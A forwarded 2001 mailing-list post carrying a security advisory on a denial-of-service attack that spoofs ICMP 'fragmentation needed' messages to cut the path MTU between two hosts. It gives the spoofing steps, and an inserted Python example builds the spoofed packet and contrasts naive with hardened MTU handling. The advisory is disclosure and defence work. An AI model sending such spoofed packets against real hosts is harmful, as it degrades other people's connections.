[iwar] FW: [NEWS] New Denial of Service attack exploits special ICMP flags


From: Robert W. Miller
From: snooker@iex.net
To: iwar@egroups.com

Thu, 18 Jan 2001 12:17:17 -0700


From: "Robert W. Miller" <snooker@iex.net>
Mailing-List: list iwar@egroups.com; contact iwar-owner@egroups.com
Reply-To: iwar@egroups.com
Content-Type: text/plain; charset=US-ASCII

The following security advisory is sent to the securiteam mailing list, and
can be found at the SecuriTeam web site: http://www.securiteam.com


New Denial of Service attack exploits special ICMP flags
--------------------------------------------------------

SUMMARY

A new attack abuses the ICMP "fragmentation needed and DF set" message
(type 3, code 4) that Path MTU discovery relies on, and lets an attacker
considerably slow down connections between two remote hosts (where at
least one has PMTU discovery enabled). The attack can be carried out with
spoofed IP packets, hiding the real attacker.

DETAILS

Vulnerable systems:
Most TCP/IP stacks that support PMTU discovery. Most notably:
 * Linux
 * BSD


Path MTU discovery is used to optimise TCP/IP connection performance: the
stack keeps a per-destination table (a hash table in the implementations
concerned) holding the MTU towards each remote end. When an ICMP
"fragmentation needed and DF set" message reaches the stack, it looks up
the destination of the quoted packet in that table to find the old MTU,
then looks at the total length of the quoted packet (the IP header and
first eight bytes of the original datagram, carried inside the ICMP
message) and computes the new, smaller MTU from it.

This process opens the possibility of an attack: anyone who can get such an
ICMP message accepted can make the host lower the MTU it uses towards
another host even when no link on the path requires it.

Recreation:
Let's take two hosts, A and B, that communicate over IP, and an attacker C
who is able to spoof IP packets in the communication between A and B.

C sends an ICMP echo request carrying some data, with the source address
set to A and the destination address set to B.

B answers it and, in doing so, creates a new entry for A in its MTU table
(if there is not an old one already).

C sends an ICMP "fragmentation needed and DF set" message, again with the
source address set to A and the destination address set to B, quoting the
ICMP echo reply that B has just sent to A. C cannot see that reply, but its
contents are easy to guess (set the right TOS, usually 0x40, if you want to
make sure the quoted packet matches).

B sets the new MTU towards A in relation to the total length of the quoted
packet.

You may want to resend these packets once every second, to keep the entry
from expiring. Repeating also helps where the TCP MSS option has been
allowed to override the MTU (it should not, but some implementations may
do this); otherwise even fewer spoofed packets are needed.
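The exchange above, as an added example that is not part of the advisory and is not antirez's code: it builds (but never sends) the spoofed ICMP "fragmentation needed and DF set" message C sends to B, quoting a guessed B-to-A echo reply, then models B's MTU table twice: once updated the way the advisory describes, and once behind the plausibility checks a hardened receiver can apply. The addresses 10.0.0.1 (A) and 10.0.0.2 (B), the 1500-byte link MTU, the echo identifier and the 552-byte floor are constructed sample values; the plateau table is the one from RFC 1191.

```python
"""Added example, not code from the SecuriTeam advisory or from antirez.

Builds (never sends) the spoofed ICMP 3/4 message from the advisory, shows
how an unchecked receiver turns it into a smaller cached MTU, and shows the
checks a hardened receiver can apply.  Addresses, the 1500-byte link MTU,
the echo identifier and the 552-byte floor are constructed sample values.
"""
import socket
import struct

# RFC 1191 plateau table: with no next-hop MTU in the ICMP error, the host
# takes the largest plateau below the quoted packet's Total Length.
PLATEAUS = [65535, 32000, 17914, 8166, 4352, 2002, 1492, 1006, 508, 296, 68]
IPV4_MIN_MTU = 68                      # RFC 791 minimum every link must carry
ICMP_ECHO_REPLY, ICMP_DEST_UNREACH, ICMP_FRAG_NEEDED = 0, 3, 4


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum (returns 0 over a valid packet)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def ipv4_header(src, dst, proto, total_len, tos=0):
    """Minimal 20-byte IPv4 header with DF set, as PMTU discovery requires."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, tos, total_len, 0, 0x4000, 64,
                      proto, 0, socket.inet_aton(src), socket.inet_aton(dst))
    return hdr[:10] + struct.pack("!H", inet_checksum(hdr)) + hdr[12:]


def spoofed_frag_needed(a, b, quoted_len, echo_id, next_hop_mtu=0, tos=0):
    """The packet C sends: outer IP src=A dst=B, ICMP type 3 code 4, quoting
    the B->A echo reply C guesses B produced (IP header + 8 bytes of ICMP).
    next_hop_mtu=0 mimics a pre-RFC 1191 router and forces the plateau path."""
    quoted = ipv4_header(b, a, socket.IPPROTO_ICMP, quoted_len, tos)
    quoted += struct.pack("!BBHHH", ICMP_ECHO_REPLY, 0, 0, echo_id, 1)
    icmp = struct.pack("!BBHHH", ICMP_DEST_UNREACH, ICMP_FRAG_NEEDED, 0, 0,
                       next_hop_mtu) + quoted
    icmp = icmp[:2] + struct.pack("!H", inet_checksum(icmp)) + icmp[4:]
    return ipv4_header(a, b, socket.IPPROTO_ICMP, 20 + len(icmp)) + icmp


def parse_frag_needed(pkt):
    """(next_hop_mtu, quoted_src, quoted_dst, quoted_len) for a well-formed
    ICMP 3/4 message, else None."""
    if len(pkt) < 56 or pkt[9] != socket.IPPROTO_ICMP:
        return None
    icmp = pkt[20:]
    if icmp[:2] != bytes([ICMP_DEST_UNREACH, ICMP_FRAG_NEEDED]) \
            or inet_checksum(icmp) != 0:
        return None
    q = icmp[8:]                           # start of the quoted datagram
    return (struct.unpack("!H", icmp[6:8])[0], socket.inet_ntoa(q[12:16]),
            socket.inet_ntoa(q[16:20]), struct.unpack("!H", q[2:4])[0])


def plateau_below(length):
    lower = [p for p in PLATEAUS if p < length]
    return lower[0] if lower else IPV4_MIN_MTU


class PmtuCache:
    """Per-destination MTU table, the 'hash table' of the advisory."""

    def __init__(self, link_mtu=1500):
        self.link_mtu, self.mtu = link_mtu, {}

    def touch(self, dst):
        """Called whenever we send to dst, e.g. B answering A's echo request."""
        self.mtu.setdefault(dst, self.link_mtu)

    def naive_update(self, pkt):
        """Behaviour the advisory exploits: trust any 3/4 message whose
        quoted destination already has an entry."""
        p = parse_frag_needed(pkt)
        if p is None or p[2] not in self.mtu:
            return None
        nh_mtu, _, q_dst, q_len = p
        new = nh_mtu or plateau_below(q_len)
        self.mtu[q_dst] = min(self.mtu[q_dst], new)
        return self.mtu[q_dst]

    def hardened_update(self, pkt, my_addr, min_pmtu=552):
        """Accept only a self-consistent message quoting a packet we could
        have sent, and never go below min_pmtu.  Returns the resulting MTU."""
        p = parse_frag_needed(pkt)
        if p is None:
            return None
        nh_mtu, q_src, q_dst, q_len = p
        cur = self.mtu.get(q_dst)
        if cur is None or q_src != my_addr:
            return cur                     # not a packet of ours
        if nh_mtu and (nh_mtu < IPV4_MIN_MTU or nh_mtu >= q_len):
            return cur                     # claimed MTU contradicts itself
        new = nh_mtu or plateau_below(q_len)
        self.mtu[q_dst] = max(min(cur, new), min_pmtu)
        return self.mtu[q_dst]
```

With a 300-byte quoted length the unchecked table drops A's MTU from 1500 to the 296-byte plateau, and quoting 69 bytes takes it to 68; the hardened table stops at the floor and rejects messages whose claimed next-hop MTU is not smaller than the packet it quotes or whose quoted source is not the receiver's own address. Note that the source and consistency checks only raise the bar: an attacker who, as in the advisory, elicits the quoted echo reply himself can still pass them, so the durable defence is the lower bound on how far an ICMP message may shrink the cached MTU (later Linux kernels expose such a floor as net.ipv4.route.min_pmtu) together with not letting an ICMP-driven MTU override the TCP MSS.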

ADDITIONAL INFORMATION

The information has been provided by antirez.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body
to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.

Det. Robert W. Miller
Colorado Internet Crimes Against
Children Task Force
Pueblo High Tech. Crime Unit
Pueblo County Sheriff's Office
320 S. Joe Martinez Blvd.
Pueblo West, CO. 81007
Tel (719)583-4736
FAX (719)583-4732
mailto:snooker@iex.net
mailto:cicactf@iex.net
http://www.co.pueblo.co.us/sheriff/
PGP key available at: http://pgpkeys.mit.edu:11371/
search on snooker@iex.net

------------------
http://all.net/